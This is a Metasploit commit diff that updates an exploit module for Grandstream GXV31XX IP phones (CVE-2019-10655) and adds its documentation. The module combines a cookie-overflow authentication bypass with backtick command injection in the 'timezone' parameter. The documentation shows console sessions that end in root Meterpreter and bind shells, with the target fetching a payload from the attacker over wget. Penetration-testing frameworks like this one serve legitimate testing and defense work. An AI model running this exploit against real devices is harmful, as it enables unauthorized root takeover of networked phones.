Land #16125, add ARCH_CMD for GXV3140 support

Author: space-r7

documentation/modules/exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.md

@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in Grandstream GXV31XX
+IP multimedia phones. The 'settimezone' action does not validate input in the
+'timezone' parameter allowing injection of arbitrary commands.
+
+A buffer overflow in the 'phonecookie' cookie parsing allows authentication
+to be bypassed by providing an alphanumeric cookie 93 characters in length.
+
+This module was tested successfully on Grandstream models:
+
+* GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
+* GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
+
+## Verification Steps
+
+1. `msfconsole`
+1. `use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec`
+1. `set rhosts [IP]`
+1. `set target [target]`
+1. `run`
+1. You should get a session
+
+## Options
+
+
+## Scenarios
+
+### Grandstream GXV3140
+
+```
+msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.111
+rhosts => 10.1.1.111
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run
+
+[*] Started bind TCP handler against 10.1.1.111:4444
+[*] Command shell session 1 opened (10.1.1.112:36769 -> 10.1.1.111:4444 ) at 2022-01-29 02:30:13 -0500
+
+
+Shell Banner:
+_!_
+-----
+
+
+/ # uname -a
+uname -a
+Linux gxv3140_000b8229ac36 2.6.10_gxv31xx #15 Tue Jul 16 11:07:04 CDT 2013 armv5tejl unknown
+/ #
+
+```
+
+### Grandstream GXV3175v2
+
+```
+msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
+rhosts => 10.1.1.109
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
+lhost => 10.1.1.110
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set target 1
+target => 1
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run
+
+[*] Started reverse TCP handler on 10.1.1.110:4444 
+[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
+[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
+[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
+[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo 
+Computer     : 10.1.1.109
+OS           :  (Linux 2.6.32_gxv3170v2)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter >
+```

documentation/modules/exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec.md

@@ -8,32 +8,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Deprecated
+
+  moved_from 'exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec'
 
   HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
+        'Name' => "Grandstream GXV31XX 'settimezone' Unauthenticated Command Execution",
         'Description' => %q{
-          This module exploits a command injection vulnerability in Grandstream GXV3175
+          This module exploits a command injection vulnerability in Grandstream GXV31XX
           IP multimedia phones. The 'settimezone' action does not validate input in the
           'timezone' parameter allowing injection of arbitrary commands.
 
           A buffer overflow in the 'phonecookie' cookie parsing allows authentication
           to be bypassed by providing an alphanumeric cookie 93 characters in length.
 
-          This module was tested successfully on Grandstream GXV3175v2
-          hardware revision V2.6A with firmware version 1.0.1.19.
+          This module was tested successfully on Grandstream models:
+          GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
+          GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
         },
         'Author' => [
           'alhazred', # Command injection vulnerability discovery and exploit
           'Brendan Scarvell', # Auth bypass discovery
           'bcoles' # Metasploit
         ],
         'License' => MSF_LICENSE,
-        'Platform' => 'linux',
+        'Platform' => %w[unix linux],
         'References' => [
           [ 'CVE', '2019-10655' ],
           [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
@@ -46,30 +50,47 @@ def initialize(info = {})
         },
         'DisclosureDate' => '2016-09-01',
         'Privileged' => true,
-        'Arch' => ARCH_ARMLE,
-        'DefaultOptions' => {
-          'PrependFork' => true,
-          'MeterpreterTryToFork' => true,
-          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
-          'CMDSTAGER::FLAVOR' => 'wget'
-        },
         'CmdStagerFlavor' => %w[wget],
         'Targets' => [
-          ['Automatic', {}]
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
+              }
+            }
+          ],
+          [
+            'Linux (ARMLE)', {
+              'Arch' => ARCH_ARMLE,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PrependFork' => true,
+                'MeterpreterTryToFork' => true,
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'wget'
+              }
+            }
+          ],
         ],
         'DefaultTarget' => 0
       )
     )
   end
 
-  def check
-    res = send_request_cgi(
+  def send_manager_request(vars_get)
+    send_request_cgi(
       'uri' => '/manager',
       'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
-      'vars_get' => {
-        'action' => 'settimezone',
-        'timezone' => ''
-      }
+      'vars_get' => vars_get
+    )
+  end
+
+  def check
+    res = send_manager_request(
+      'action' => 'settimezone',
+      'timezone' => ''
     )
 
     if res && res.code == 200 && res.body.to_s.include?('Response=Success')
@@ -79,14 +100,10 @@ def check
     CheckCode::Safe
   end
 
-  def execute_command(cmd, _opts)
-    res = send_request_cgi(
-      'uri' => '/manager',
-      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
-      'vars_get' => {
-        'action' => 'settimezone',
-        'timezone' => "`#{cmd}`"
-      }
+  def execute_command(cmd, _opts = {})
+    res = send_manager_request(
+      'action' => 'settimezone',
+      'timezone' => "`#{cmd}`"
     )
     unless res
       fail_with(Failure::Unreachable, 'Connection failed')
@@ -100,9 +117,13 @@ def execute_command(cmd, _opts)
   end
 
   def exploit
-    execute_cmdstager(
-      linemax: 220, # 255 minus URL encoding
-      background: true
-    )
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(
+        linemax: 220, # 255 minus URL encoding
+        background: true
+      )
+    end
   end
 end